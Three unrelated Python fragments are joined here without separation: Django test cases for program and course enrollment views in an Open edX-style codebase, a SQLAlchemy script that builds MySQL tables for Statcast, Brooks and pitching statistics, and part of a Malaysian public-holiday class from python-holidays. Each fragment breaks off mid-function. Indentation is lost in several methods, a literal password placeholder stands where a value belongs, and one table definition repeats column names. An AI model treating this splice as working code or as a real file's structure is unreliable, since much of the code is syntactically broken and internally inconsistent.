        Create a course run based on ``course_key_string``, then enroll
        ``user`` in that course run as course staff.

        Returns the created CourseKey.
        """
        course_key_to_create = CourseKey.from_string(course_key_string)
        CourseOverviewFactory(id=course_key_to_create)
        CourseRunFactory.create(key=str(course_key_to_create))
        CourseEnrollmentFactory.create(course_id=course_key_to_create, user=user)
        CourseStaffRole(course_key_to_create).add_users(user)
        return course_key_to_create

    @ddt.data(
        (
            ['garbage-program'],
            ['garbage-life']
        ),
        (
            ['garbage-program', 'garbage-life'],
            ['garbage-program', 'garbage-life']
        )
    )
    @ddt.unpack
    def test_course_staff_of_multiple_courses(
        self,
        program_slugs_to_return_first,
        program_slugs_to_return_second
    ):
        """Programs gathered across multiple administered courses are de-duplicated."""
        def find_program_by_marketing_slug(slug, program_list):
            # Linear scan is fine for the three-item fixture list.
            for program in program_list:
                if program['marketing_slug'] == slug:
                    return program
            return None

        other_course_key = self._enroll_user_into_course_as_course_staff(
            self.course_staff,
            'course-v1:edX+ToyX+Other_Course'
        )
        # NOTE(review): anonymized `<PASSWORD>` placeholder restored to self.password.
        self.client.login(username=self.course_staff.username, password=self.password)

        programs_to_return_first = [
            find_program_by_marketing_slug(
                p_slug,
                self.mock_program_data
            ) for p_slug in program_slugs_to_return_first
        ]
        programs_to_return_second = [
            find_program_by_marketing_slug(
                p_slug,
                self.mock_program_data
            ) for p_slug in program_slugs_to_return_second
        ]

        with mock.patch(
            _VIEW_PATCH_FORMAT.format('get_programs'),
            autospec=True,
            side_effect=[[], programs_to_return_first, programs_to_return_second]
        ) as mock_get_programs:
            response = self.client.get(reverse(self.view_name) + '?type=masters')

        assert status.HTTP_200_OK == response.status_code
        assert len(response.data) == 2
        mock_get_programs.assert_has_calls([
            mock.call(course=self.course_id),
            mock.call(course=other_course_key),
        ], any_order=True)

    def test_course_staff_of_non_program_course(self):
        """Course staff of a non-program course still see programs they are enrolled in."""
        created_course_key = self._enroll_user_into_course_as_course_staff(
            self.student,
            'course-v1:edX+ToyX+Other_Course'
        )
        program_to_enroll = self.mock_program_data[0]
        ProgramEnrollmentFactory.create(
            program_uuid=program_to_enroll['uuid'],
            curriculum_uuid=self.curriculum_uuid,
            user=self.student,
            status='enrolled',
            external_user_key=f'user-{self.student.id}',
        )
        # NOTE(review): anonymized `<PASSWORD>` placeholder restored to self.password.
        self.client.login(username=self.student.username, password=self.password)

        with mock.patch(
            _VIEW_PATCH_FORMAT.format('get_programs'),
            autospec=True,
            side_effect=[[], [program_to_enroll]]
        ) as mock_get_programs:
            response = self.client.get(reverse(self.view_name))

        assert status.HTTP_200_OK == response.status_code
        assert len(response.data) == 1
        mock_get_programs.assert_has_calls([
            mock.call(course=created_course_key),
            mock.call(uuids=[UUID(program_to_enroll['uuid'])]),
        ])

    @mock.patch(_VIEW_PATCH_FORMAT.format('get_programs'), autospec=True, return_value=None)
    def test_learner_200_if_no_programs_enrolled(self, mock_get_programs):
        """A learner with no program enrollments gets an empty 200 response."""
        self.client.login(username=self.student.username, password=self.password)
        response = self.client.get(reverse(self.view_name))

        assert status.HTTP_200_OK == response.status_code
        assert response.data == []
        mock_get_programs.assert_called_once_with(uuids=[])

    def test_learner_200_many_programs(self):
        """A learner enrolled in several programs gets all of them back."""
        for program in self.mock_program_data:
            ProgramEnrollmentFactory.create(
                program_uuid=program['uuid'],
                curriculum_uuid=self.curriculum_uuid,
                user=self.student,
                status='pending',
                external_user_key=f'user-{self.student.id}',
            )
        self.client.login(username=self.student.username, password=self.password)

        with mock.patch(
            _VIEW_PATCH_FORMAT.format('get_programs'),
            autospec=True,
            return_value=self.mock_program_data
        ) as mock_get_programs:
            response = self.client.get(reverse(self.view_name))

        assert status.HTTP_200_OK == response.status_code
        assert len(response.data) == 3
        mock_get_programs.assert_called_once_with(uuids=[UUID(item['uuid']) for item in self.mock_program_data])
@ddt.ddt
class ProgramCourseEnrollmentOverviewGetTests(
    ProgramCacheMixin,
    SharedModuleStoreTestCase,
    APITestCase
):
    """
    Tests for the ProgramCourseEnrollmentOverview view GET method.
    """
    # Reusable patcher for the resume-URL helper; individual tests are expected
    # to start/stop it (or use it as a context manager).
    patch_resume_url = mock.patch(
        _UTILS_PATCH_FORMAT.format('get_resume_urls_for_enrollments'),
        autospec=True,
    )
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.program_uuid = '00000000-1111-2222-3333-444444444444'
cls.curriculum_uuid = 'aaaaaaaa-1111-2222-3333-444444444444'
cls.other_curriculum_uuid = 'bbbbbbbb-1111-2222-3333-444444444444'
cls.course_id = CourseKey.from_string('course-v1:edX+ToyX+Toy_Course')
cls.course_run = CourseRunFactory.create(key=str(cls.course_id))
cls.course = CourseFactory.create(course_runs=[cls.course_run])
cls.username = 'student'
cls.password = 'password'
cls.student = UserFactory.create(username=cls.username, password=<PASSWORD>)
# only freeze time when defining these values and not on the whole test case
# as test_multiple_enrollments_all_enrolled relies on actual differences in modified datetimes
with freeze_time('2019-01-01'):
cls.yesterday = timezone.now() - timedelta(1)
cls.tomorrow = timezone.now() + timedelta(1)
cls.modulestore_course = ModulestoreCourseFactory.create(
org="edX",
course="ToyX",
run="Toy_Course",
start=cls.yesterday,
end=cls.tomorrow,
)
cls.relative_certificate_download_url = '/download-the-certificates'
cls.absolute_certificate_download_url = 'http://www.certificates.com/'
# create program enrollment
cls.program_enrollment = ProgramEnrollmentFactory.create(
program_uuid=cls.program_uuid,
curriculum_uuid=cls.curriculum_uuid,
user=cls.student,
)
# create course overview
cls.course_overview = CourseOverviewFactory.create(
id=cls.course_id,
start=cls.yesterday,
end=cls.tomorrow,
)
# create course enrollment
cls.course_enrollment = CourseEnrollmentFactory.create(
course=cls.course_overview,
user=cls.student,
mode=CourseMode.MASTERS,
)
# create program course enrollment
cls.program_course_enrollment = ProgramCourseEnrollmentFactory.create(
program_enrollment=cls.program_enrollment,
course_enrollment=cls.course_enrollment,
course_key=cls.course_id,
status='active',
)
# create program
catalog_org = OrganizationFactory(key='organization_key')
cls.program = ProgramFactory(
uuid=cls.program_uuid,
authoring_organizations=[catalog_org],
)
cls.program['curricula'][0]['courses'].append(cls.course)
    def setUp(self):
        """Prime the catalog cache with the shared program before each test."""
        super().setUp()
        self.set_program_in_catalog_cache(self.program_uuid, self.program)
def create_generated_certificate(self, download_url=None):
return GeneratedCertificateFactory.create(
user=self.student,
course_id=self.course_id,
status=CertificateStatuses.downloadable,
mode='verified',
download_url=(download_url or self.relative_certificate_download_url),
grade="0.88",
verify_uuid=uuid4(),
)
def log_in(self, user=None):
"""
Log in `self.client` as `user` | |
# Repo: BenikaH/sportscraper — file: sportscraper/scripts/db_connector.py
from sqlalchemy import *
import click
def upload_block(data, db_engine, db_tablename):
    """Append *data* (a DataFrame) to *db_tablename* via *db_engine*, 10k rows per chunk."""
    sql_kwargs = {
        'con': db_engine,
        'if_exists': 'append',
        'index': False,
        'chunksize': 10000,
    }
    data.to_sql(db_tablename, **sql_kwargs)
def initdb_statcast(db_username, db_password, db_hostname, db_name, db_tablename):
    """
    Create (if absent) the Statcast pitch-level table in MySQL and return a
    SQLAlchemy engine bound to that database.

    Args:
        db_username: MySQL user name.
        db_password: MySQL password (without the leading ':').
        db_hostname: MySQL host.
        db_name: database (schema) name.
        db_tablename: name of the table to create.

    Returns:
        The SQLAlchemy engine connected to ``db_name``.
    """
    # Prefix with ':' so it slots into the user:password@host connection URL.
    db_password = ":" + db_password
    statcast_engine = create_engine("mysql+mysqldb://" + db_username + db_password + "@" + db_hostname + "/" + db_name)
    meta = MetaData(bind=statcast_engine)
    # Columns mirror a Statcast CSV export; everything except the synthetic
    # primary key is nullable because exports routinely have missing values.
    # The Table() call registers the schema on `meta`; the binding is used by
    # create_all() below, so the name `table_statcast` is otherwise unused.
    table_statcast = Table(db_tablename, meta,
        Column("id", Integer, primary_key=True, autoincrement=True, nullable=False),
        Column("index", Integer, nullable=True),
        Column("sz_bot", Float, nullable=True),
        Column("inning", Float, nullable=True),
        Column("pitch_number", Float, nullable=True),
        Column("hit_distance_sc", Float, nullable=True),
        Column("plate_z", Float, nullable=True),
        Column("plate_x", Float, nullable=True),
        Column("umpire", Float, nullable=True),
        Column("pitch_type", String(512), nullable=True),
        Column("spin_rate_deprecated", Float, nullable=True),
        Column("pos8_person_id", Float, nullable=True),
        Column("pos6_person_id", Float, nullable=True),
        Column("pos2_person_id.1", Float, nullable=True),
        Column("on_3b", Float, nullable=True),
        Column("release_pos_y", Float, nullable=True),
        Column("pos2_person_id", Float, nullable=True),
        Column("launch_speed", Float, nullable=True),
        Column("ay", Float, nullable=True),
        Column("ax", Float, nullable=True),
        Column("az", Float, nullable=True),
        Column("p_throws", String(512), nullable=True),
        Column("release_speed", Float, nullable=True),
        Column("break_length_deprecated", Float, nullable=True),
        Column("at_bat_number", Float, nullable=True),
        Column("vy0", Float, nullable=True),
        Column("away_team", String(512), nullable=True),
        Column("player_name", String(512), nullable=True),
        Column("zone", Float, nullable=True),
        Column("pos7_person_id", Float, nullable=True),
        Column("babip_value", Float, nullable=True),
        Column("bb_type", String(512), nullable=True),
        Column("release_spin_rate", Float, nullable=True),
        Column("effective_speed", Float, nullable=True),
        Column("pos3_person_id", Float, nullable=True),
        Column("hc_y", Float, nullable=True),
        Column("inning_topbot", String(512), nullable=True),
        Column("release_extension", Float, nullable=True),
        Column("on_1b", Float, nullable=True),
        Column("pos1_person_id", Float, nullable=True),
        Column("hit_location", Float, nullable=True),
        Column("release_pos_x", Float, nullable=True),
        Column("events", String(512), nullable=True),
        Column("release_pos_z", Float, nullable=True),
        Column("game_year", Float, nullable=True),
        Column("pos4_person_id", Float, nullable=True),
        Column("woba_value", Float, nullable=True),
        Column("description", String(512), nullable=True),
        Column("pfx_z", Float, nullable=True),
        Column("launch_angle", Float, nullable=True),
        Column("pitcher", Float, nullable=True),
        Column("strikes", Float, nullable=True),
        Column("pos9_person_id", Float, nullable=True),
        Column("batter", Float, nullable=True),
        Column("pfx_x", Float, nullable=True),
        Column("hc_x", Float, nullable=True),
        Column("on_2b", Float, nullable=True),
        Column("game_pk", Float, nullable=True),
        Column("spin_dir", Float, nullable=True),
        Column("iso_value", Float, nullable=True),
        Column("woba_denom", Float, nullable=True),
        Column("home_team", String(512), nullable=True),
        Column("balls", Float, nullable=True),
        Column("estimated_ba_using_speedangle", Float, nullable=True),
        Column("estimated_woba_using_speedangle", Float, nullable=True),
        Column("type", String(512), nullable=True),
        Column("tfs_deprecated", Float, nullable=True),
        Column("des", String(512), nullable=True),
        Column("game_type", String(512), nullable=True),
        Column("outs_when_up", Float, nullable=True),
        Column("vx0", Float, nullable=True),
        Column("sz_top", Float, nullable=True),
        Column("launch_speed_angle", Float, nullable=True),
        Column("stand", String(512), nullable=True),
        Column("game_date", DateTime, nullable=True),
        Column("break_angle_deprecated", Float, nullable=True),
        Column("vz0", Float, nullable=True),
        Column("sv_id", String(512), nullable=True),
        Column("tfs_zulu_deprecated", Float, nullable=True),
        # extend_existing lets this definition replace a previously registered
        # table of the same name in the metadata.
        Column("pos5_person_id", Float, nullable=True), extend_existing=True)
    meta.create_all(statcast_engine)
    return statcast_engine
def initdb_brooks(db_username, db_password, db_hostname, db_name, db_tablename):
    """
    Create (if absent) the Brooks Baseball PITCHf/x table in MySQL and return
    a SQLAlchemy engine bound to that database.

    Args:
        db_username: MySQL user name.
        db_password: MySQL password (without the leading ':').
        db_hostname: MySQL host.
        db_name: database (schema) name.
        db_tablename: name of the table to create.

    Returns:
        The SQLAlchemy engine connected to ``db_name``.
    """
    # BUG FIX: an anonymized `<PASSWORD>` placeholder (a syntax error) replaced
    # the password here; restored to match initdb_statcast/initdb_pitching.
    db_password = ":" + db_password
    brooks_engine = create_engine("mysql+mysqldb://" + db_username + db_password + "@" + db_hostname + "/" + db_name)
    meta = MetaData(bind=brooks_engine)
    # Columns mirror the Brooks Baseball pitch-level export; everything except
    # the synthetic primary key is nullable because values may be missing.
    # NOTE(review): unlike initdb_statcast this Table omits extend_existing=True;
    # left as-is to preserve behavior — confirm whether that is intentional.
    table_brooks = Table(db_tablename, meta,
        Column("id", Integer, primary_key=True, autoincrement=True, nullable=False),
        Column("inning", Integer, nullable=True),
        Column("y0", Integer, nullable=True),
        Column("pitcher_team", String(512), nullable=True),
        Column("start_speed", Float, nullable=True),
        Column("play_guid", String(512), nullable=True),
        Column("pfx_zdatafile", Float, nullable=True),
        Column("z0", Float, nullable=True),
        Column("ab_id", Integer, nullable=True),
        Column("pitcher_id", Integer, nullable=True),
        Column("ay", Float, nullable=True),
        Column("zone_location", Float, nullable=True),
        Column("pxold", Float, nullable=True),
        Column("batter_id", Integer, nullable=True),
        Column("p_throws", String(512), nullable=True),
        Column("park_sv_id", String(512), nullable=True),
        Column("vy0", Float, nullable=True),
        Column("az", Float, nullable=True),
        Column("ab_count", Integer, nullable=True),
        Column("pz", Float, nullable=True),
        Column("spin", Float, nullable=True),
        Column("px", Float, nullable=True),
        Column("pfx_xdatafile", Float, nullable=True),
        Column("date_stamp", String(512), nullable=True),
        Column("gid", String(512), nullable=True),
        Column("ftime", Float, nullable=True),
        Column("tstart", Float, nullable=True),
        Column("uncorrected_pfx_x", Float, nullable=True),
        Column("uncorrected_pfx_z", Float, nullable=True),
        Column("type", String(512), nullable=True),
        Column("sz_bot", Float, nullable=True),
        Column("norm_ht", Float, nullable=True),
        Column("pfx_z", Float, nullable=True),
        Column("strikes", Integer, nullable=True),
        Column("mlbam_pitch_name", String(512), nullable=True),
        Column("pitch_con", Float, nullable=True),
        Column("pfx_x", Float, nullable=True),
        Column("vystart", Float, nullable=True),
        Column("ab_total", Integer, nullable=True),
        Column("pdes", String(512), nullable=True),
        Column("balls", Integer, nullable=True),
        Column("des", String(512), nullable=True),
        Column("x0", Float, nullable=True),
        Column("ax", Float, nullable=True),
        Column("sz_top", Float, nullable=True),
        Column("stand", String(512), nullable=True),
        Column("sb", Integer, nullable=True),
        Column("vz0", Float, nullable=True),
        Column("pzold", Float, nullable=True),
        Column("vx0", Float, nullable=True))
    meta.create_all(brooks_engine)
    return brooks_engine
def initdb_pitching(db_username, db_password, db_hostname, db_name, db_tablename):
db_password = ":" + db_password
pitching_engine = create_engine("mysql+mysqldb://" + db_username + db_password + "@" + db_hostname + "/" + db_name)
meta = MetaData(bind=pitching_engine)
table_pitching = Table(db_tablename, meta,
*[Column("Name", String(512), nullable=True),
Column("Team", String(512), nullable=True),
Column("Age", Float, nullable=True),
Column("ERA", Float, nullable=True),
Column("UN (pfx)", Float, nullable=True),
Column("wCH (pi)", Float, nullable=True),
Column("KC-X (pfx)", Float, nullable=True),
Column("FC-Z (pfx)", Float, nullable=True),
Column("BB", Float, nullable=True),
Column("wKN", Float, nullable=True),
Column("wCH/C (pfx)", Float, nullable=True),
Column("wKC (pfx)", Float, nullable=True),
Column("BK", Float, nullable=True),
Column("wCH/C (pi)", Float, nullable=True),
Column("BU", Float, nullable=True),
Column("FC-Z (pi)", Float, nullable=True),
Column("BB/9", Float, nullable=True),
Column("Oppo", Float, nullable=True),
Column("vSC (pfx)", Float, nullable=True),
Column("WP", Float, nullable=True),
Column("wSL (pfx)", Float, nullable=True),
Column("wCU (pfx)", Float, nullable=True),
Column("SF", Float, nullable=True),
Column("HBP", Float, nullable=True),
Column("pLI", Float, nullable=True),
Column("FA-X (pi)", Float, nullable=True),
Column("vSI (pi)", Float, nullable=True),
Column("E-F", Float, nullable=True),
Column("FS (pi)", Float, nullable=True),
Column("CH", Float, nullable=True),
Column("Zone", Float, nullable=True),
Column("RS", Float, nullable=True),
Column("SL-Z (pfx)", Float, nullable=True),
Column("wFC/C (pi)", Float, nullable=True),
Column("KN", Float, nullable=True),
Column("wFC (pfx)", Float, nullable=True),
Column("wSL", Float, nullable=True),
Column("Strikes", Float, nullable=True),
Column("GB/FB", Float, nullable=True),
Column("RAR", Float, nullable=True),
Column("wSI (pfx)", Float, nullable=True),
Column("FS-X (pfx)", Float, nullable=True),
Column("SI-X (pi)", Float, nullable=True),
Column("SL-X (pfx)", Float, nullable=True),
Column("SB-Z (pi)", Float, nullable=True),
Column("vFA (pi)", Float, nullable=True),
Column("vFC (pfx)", Float, nullable=True),
Column("FIP", Float, nullable=True),
Column("GS", Float, nullable=True),
Column("CS (pi)", Float, nullable=True),
Column("Relief-IP", Float, nullable=True),
Column("Med", Float, nullable=True),
Column("SFv", Float, nullable=True),
Column("H", Float, nullable=True),
Column("SB (pi)", Float, nullable=True),
Column("L", Float, nullable=True),
Column("KN (pfx)", Float, nullable=True),
Column("wFA/C (pfx)", Float, nullable=True),
Column("FO (pfx)", Float, nullable=True),
Column("GB", Float, nullable=True),
Column("Swing (pfx)", Float, nullable=True),
Column("vEP (pfx)", Float, nullable=True),
Column("wCH (pfx)", Float, nullable=True),
Column("wKN/C (pfx)", Float, nullable=True),
Column("vFT (pfx)", Float, nullable=True),
Column("FA-Z (pi)", Float, nullable=True),
Column("SC (pfx)", Float, nullable=True),
Column("CH-Z (pi)", Float, nullable=True),
Column("CH (pi)", Float, nullable=True),
Column("wCT", Float, nullable=True),
Column("FDP-Wins", Float, nullable=True),
Column("FT (pfx)", Float, nullable=True),
Column("KN (pi)", Float, nullable=True),
Column("ERA-", Float, nullable=True),
Column("wKN/C", Float, nullable=True),
Column("BUH", Float, nullable=True),
Column("wCB", Float, nullable=True),
Column("wFC/C (pfx)", Float, nullable=True),
Column("Z-Contact (pfx)", Float, nullable=True),
Column("CHv", Float, nullable=True),
Column("CH-X (pfx)", Float, nullable=True),
Column("KNv", Float, nullable=True),
Column("wCH", Float, nullable=True),
Column("wCB/C", Float, nullable=True),
Column("SL-X (pi)", Float, nullable=True),
Column("ShO", Float, nullable=True),
Column("vCS (pi)", Float, nullable=True),
Column("SIERA", Float, nullable=True),
Column("Pace (pi)", Float, nullable=True),
Column("FB", Float, nullable=True),
Column("CB", Float, nullable=True),
Column("HR", Float, nullable=True),
Column("FA (pi)", Float, nullable=True),
Column("BS", Float, nullable=True),
Column("wFB/C", Float, nullable=True),
Column("KC (pfx)", Float, nullable=True),
Column("tERA", Float, nullable=True),
Column("EP-Z (pfx)", Float, nullable=True),
Column("K/9", Float, nullable=True),
Column("FC (pi)", Float, nullable=True),
Column("FS-Z (pfx)", Float, nullable=True),
Column("wSC/C (pfx)", Float, nullable=True),
Column("IFH", Float, nullable=True),
Column("EP-X (pfx)", Float, nullable=True),
Column("EP (pfx)", Float, nullable=True),
Column("H/9", Float, nullable=True),
Column("wFC (pi)", Float, nullable=True),
Column("wKN (pfx)", Float, nullable=True),
Column("G", Float, nullable=True),
Column("CU-X (pi)", Float, nullable=True),
Column("Soft", Float, nullable=True),
Column("Season", Float, nullable=True),
Column("wEP/C (pfx)", Float, nullable=True),
Column("vSL (pi)", Float, nullable=True),
Column("Hard", Float, nullable=True),
Column("SwStr", Float, nullable=True),
Column("FS (pfx)", Float, nullable=True),
Column("kwERA", Float, nullable=True),
Column("BUH", Float, nullable=True),
Column("wFT (pfx)", Float, nullable=True),
Column("vCU (pi)", Float, nullable=True),
Column("wSB/C (pi)", Float, nullable=True),
Column("LOB-Wins", Float, nullable=True),
Column("HR/FB", Float, nullable=True),
Column("SI-Z (pi)", Float, nullable=True),
Column("wXX (pi)", Float, nullable=True),
Column("SC-X (pfx)", Float, nullable=True),
Column("wCS (pi)", Float, nullable=True),
Column("Age Rng", String(512), nullable=True),
Column("SL (pi)", Float, nullable=True),
Column("CS-X (pi)", Float, nullable=True),
Column("wSI/C (pfx)", Float, nullable=True),
Column("wCU (pi)", Float, nullable=True),
Column("wFS/C (pfx)", Float, nullable=True),
Column("wEP (pfx)", Float, nullable=True),
Column("LD", Float, nullable=True),
Column("Clutch", Float, nullable=True),
Column("Dollars", String(512), nullable=True),
Column("wSF/C", Float, nullable=True),
Column("wFS/C (pi)", Float, nullable=True),
Column("RS/9", Float, nullable=True),
Column("vFA (pfx)", Float, nullable=True),
Column("CBv", Float, nullable=True),
Column("Swing", Float, nullable=True),
Column("W", Float, nullable=True),
Column("O-Swing (pfx)", Float, nullable=True),
Column("wSL (pi)", Float, nullable=True),
Column("xFIP", Float, nullable=True),
Column("FO-Z (pfx)", Float, nullable=True),
Column("ER", Float, nullable=True),
Column("SI-Z (pfx)", Float, nullable=True),
Column("MD", Float, nullable=True),
Column("GB", Float, nullable=True),
Column("FC-X (pfx)", Float, nullable=True),
Column("Z-Swing (pi)", Float, nullable=True),
Column("wSF", Float, nullable=True),
Column("vKN (pi)", Float, nullable=True),
Column("HR/9", Float, nullable=True),
Column("CH (pfx)", Float, nullable=True),
Column("vSL (pfx)", Float, nullable=True),
Column("wSB (pi)", Float, nullable=True),
Column("FA-Z (pfx)", Float, nullable=True),
Column("Pull", Float, nullable=True),
Column("Z-Swing (pfx)", Float, nullable=True),
Column("FA (pfx)", Float, nullable=True),
Column("AVG", Float, nullable=True),
Column("wFS (pfx)", Float, nullable=True),
Column("FIP-", Float, nullable=True),
Column("K/BB", Float, nullable=True),
Column("TBF", Float, nullable=True),
Column("SI-X (pfx)", Float, nullable=True),
Column("wSI/C (pi)", Float, nullable=True),
Column("XX", Float, nullable=True),
Column("K", Float, nullable=True),
Column("F-Strike", Float, nullable=True),
Column("REW", Float, nullable=True),
Column("vFO (pfx)", Float, nullable=True),
Column("FB", Float, nullable=True),
Column("WPA/LI", Float, nullable=True),
Column("SL-Z (pi)", Float, nullable=True),
Column("FC-X (pi)", Float, nullable=True),
Column("wSI (pi)", Float, nullable=True),
Column("CU-Z (pfx)", Float, nullable=True),
Column("XX-X (pi)", Float, nullable=True),
Column("Contact (pfx)", Float, nullable=True),
Column("CTv", Float, nullable=True),
Column("FS-Z (pi)", Float, nullable=True),
Column("BABIP", Float, nullable=True),
Column("wFB", Float, nullable=True),
Column("CH-X (pi)", Float, nullable=True),
Column("wCH/C", Float, nullable=True),
Column("Pitches", Float, nullable=True),
Column("KN-X (pfx)", Float, nullable=True),
Column("RE24", Float, nullable=True),
Column("wKN/C (pi)", Float, nullable=True),
Column("wSL/C (pi)", Float, nullable=True),
Column("SC-Z (pfx)", Float, nullable=True),
Column("vXX (pi)", Float, nullable=True),
Column("Pace", Float, nullable=True),
Column("KN-X (pi)", Float, nullable=True),
Column("WPA", Float, nullable=True),
Column("CU-X (pfx)", Float, nullable=True),
Column("wFS (pi)", Float, nullable=True),
Column("gmLI", Float, nullable=True),
Column("Balls", Float, nullable=True),
Column("Swing (pi)", Float, nullable=True),
Column("FBv", Float, nullable=True),
Column("KC-Z (pfx)", Float, nullable=True),
Column("CG", Float, nullable=True),
Column("XX (pi)", Float, nullable=True),
Column("wFA (pfx)", Float, nullable=True),
Column("wCT/C", Float, nullable=True),
Column("R", Float, nullable=True),
Column("wCU/C (pi)", Float, nullable=True),
Column("O-Swing", Float, nullable=True),
Column("Starting", Float, nullable=True),
Column("WAR", Float, nullable=True),
Column("WHIP", Float, nullable=True),
Column("wXX/C (pi)", | |
# -*- coding: utf-8 -*-
# python-holidays
# ---------------
# A fast, efficient Python library for generating country, province and state
# specific sets of holidays on the fly. It aims to make determining whether a
# specific date is a holiday as fast and flexible as possible.
#
# Authors: dr-prodigy (c) 2017-2022
#          ryanss (c) 2014-2017
# Website: https://github.com/dr-prodigy/python-holidays
# License: MIT (see LICENSE file)
from datetime import date, timedelta
from typing import Iterable, Optional, Union
from dateutil.easter import easter
from dateutil.relativedelta import relativedelta as rd, MO, FR, SA, SU
from dateutil.rrule import MONTHLY, rrule
from holidays.constants import (
JAN,
FEB,
MAR,
APR,
MAY,
JUN,
JUL,
AUG,
SEP,
OCT,
NOV,
DEC,
)
from holidays.constants import SUN
from holidays.holiday_base import HolidayBase
from holidays.utils import _ChineseLuniSolar, _islamic_to_gre
class Malaysia(HolidayBase):
    # ISO 3166-1 alpha-2 country code.
    country = "MY"
    # State / federal-territory codes accepted as ``subdiv``.
    # These are project-specific codes, not ISO 3166-2 (see __init__ docstring).
    subdivisions = [
        "JHR",
        "KDH",
        "KTN",
        "MLK",
        "NSN",
        "PHG",
        "PRK",
        "PLS",
        "PNG",
        "SBH",
        "SWK",
        "SGR",
        "TRG",
        "KUL",
        "LBN",
        "PJY",
    ]
    def __init__(
        self,
        years: Optional[Union[int, Iterable[int]]] = None,
        expand: bool = True,
        observed: bool = True,
        subdiv: Optional[str] = None,
        prov: Optional[str] = None,
        state: Optional[str] = None,
    ) -> None:
        """
        A subclass of :py:class:`HolidayBase` representing public holidays in
        Malaysia.

        If ``subdiv`` for a state is not supplied, only nationwide holidays are
        returned. The following ``subdiv`` state codes are used (ISO 3166-2
        subdivision codes are not yet supported):

        - JHR: Johor
        - KDH: Kedah
        - KTN: Kelantan
        - MLK: Melaka
        - NSN: Negeri Sembilan
        - PHG: Pahang
        - PRK: Perak
        - PLS: Perlis
        - PNG: Pulau Pinang
        - SBH: Sabah
        - SWK: Sarawak
        - SGR: Selangor
        - TRG: Terengganu
        - KUL: FT Kuala Lumpur
        - LBN: FT Labuan
        - PJY: FT Putrajaya

        Limitations:

        - Prior to 2021: holidays are not accurate.
        - 2027 and later: Thaipusam dates are estimated, and so denoted.

        Reference: `Wikipedia
        <https://en.wikipedia.org/wiki/Public_holidays_in_Malaysia>`__

        Country created by: `Eden <https://github.com/jusce17>`__

        Country maintained by: `mborsetti <https://github.com/mborsetti>`__

        See parameters and usage in :py:class:`HolidayBase`.
        """
        # Lunisolar calculator reused by _populate for Chinese New Year,
        # Vesak and Deepavali date estimates.
        self.cnls = _ChineseLuniSolar()
        super().__init__(years, expand, observed, subdiv, prov, state)
def _populate(self, year):
# New Year's Day
if self.subdiv not in ("JHR", "KDH", "KTN", "PLS", "TRG"):
self[date(year, JAN, 1)] = "New Year's Day"
# Birthday of the Prophet Muhammad (s.a.w.).
# a.k.a. Maulidur Rasul (Sabah Act)
for hol_date in self.my_islamic_to_gre(year, 3, 12):
self[
hol_date
] = "<NAME> (Birthday of the Prophet Muhammad)"
# Hari Kebangsaan or National Day.
self[date(year, AUG, 31)] = "National Day"
# Chinese New Year (one day in the States of Kelantan and Terengganu,
# two days in the other States).
hol_date = self.cnls.lunar_n_y_date(year)
self[hol_date] = "Chinese New Year"
# The second day of Chinese New Year is not a federal holiday in
# Kelantan and Terengganu. However, it is gazetted as a state holiday
# in both states, effectively making it a nationwide holiday.
self[hol_date + rd(days=+1)] = "Chinese New Year Holiday"
# Wesak Day.
# Date of observance is announced yearly
# https://en.wikipedia.org/wiki/Vesak#Dates_of_observance
dates_obs = {
2001: (MAY, 7),
2002: (MAY, 27),
2003: (MAY, 15),
2004: (JUN, 2),
2005: (MAY, 23),
2006: (MAY, 12),
2007: (MAY, 31),
2008: (MAY, 19),
2009: (MAY, 9),
2010: (MAY, 28),
2011: (MAY, 17),
2012: (MAY, 5),
2013: (MAY, 24),
2014: (MAY, 13),
2015: (JUN, 1),
2016: (MAY, 20),
2017: (MAY, 10),
2018: (MAY, 29),
2019: (MAY, 19),
2020: (MAY, 7),
2021: (MAY, 26),
2022: (MAY, 15),
}
if year in dates_obs:
hol_date = date(year, *dates_obs[year])
self[hol_date] = "Vesak Day"
else:
hol_date = self.cnls.vesak_may_date(year)
self[hol_date] = "Vesak Day* (*estimated; ~10% chance +/- 1 day)"
# Birthday of [His Majesty] the Yang di-Pertuan Agong.
if year <= 2017:
hol_date = rrule(
MONTHLY,
dtstart=date(year, JUN, 1),
count=1,
bysetpos=1,
byweekday=SA,
)[0]
elif year == 2018:
hol_date = date(2018, SEP, 9)
else:
hol_date = rrule(
MONTHLY,
dtstart=date(year, JUN, 1),
count=1,
bysetpos=1,
byweekday=MO,
)[0]
self[hol_date] = "Birthday of SPB Yang di-Pertuan Agong"
# Hari Raya Puasa (2 days).
# aka Eid al-Fitr;
# exact date of observance is announced yearly
dates_obs = {
2001: [(DEC, 17)],
2002: [(DEC, 6)],
2003: [(NOV, 25)],
2004: [(NOV, 14)],
2005: [(NOV, 3)],
2006: [(OCT, 24)],
2007: [(OCT, 13)],
2008: [(OCT, 1)],
2009: [(SEP, 20)],
2010: [(SEP, 10)],
2011: [(AUG, 30)],
2012: [(AUG, 19)],
2013: [(AUG, 8)],
2014: [(JUL, 28)],
2015: [(JUL, 17)],
2016: [(JUL, 6)],
2017: [(JUN, 25)],
2018: [(JUN, 15)],
2019: [(JUN, 5)],
2020: [(MAY, 24)],
2021: [(MAY, 13)],
2022: [(MAY, 2)],
}
if year in dates_obs:
for date_obs in dates_obs[year]:
hol_date = date(year, *date_obs)
self[hol_date] = "Hari Raya Puasa"
self[hol_date + rd(days=+1)] = "Second day of Hari Raya Puasa"
else:
for date_obs in _islamic_to_gre(year, 10, 1):
hol_date = date_obs
self[hol_date] = "Hari Raya Puasa* (*estimated)"
self[hol_date + rd(days=+1)] = (
"Second day of Hari Raya Puasa*" " (*estimated)"
)
# Hari Raya Haji and Arafat Day.
# Date of observance is announced yearly.
dates_obs = {
2001: [(MAR, 6)],
2002: [(FEB, 23)],
2003: [(FEB, 12)],
2004: [(FEB, 1)],
2005: [(JAN, 21)],
2006: [(JAN, 10)],
2007: [(DEC, 20)],
2008: [(DEC, 8)],
2009: [(NOV, 27)],
2010: [(NOV, 17)],
2011: [(NOV, 6)],
2012: [(OCT, 26)],
2013: [(OCT, 15)],
2014: [(OCT, 5)],
2015: [(SEP, 24)],
2016: [(SEP, 12)],
2017: [(SEP, 1)],
2018: [(AUG, 22)],
2019: [(AUG, 11)],
2020: [(JUL, 31)],
2021: [(JUL, 20)],
2022: [(JUL, 9)],
}
if year in dates_obs:
for date_obs in dates_obs[year]:
hol_date = date(year, *date_obs)
self[hol_date] = "Hari Raya Haji"
if self.subdiv == "TRG":
# Arafat Day is one day before Eid al-Adha
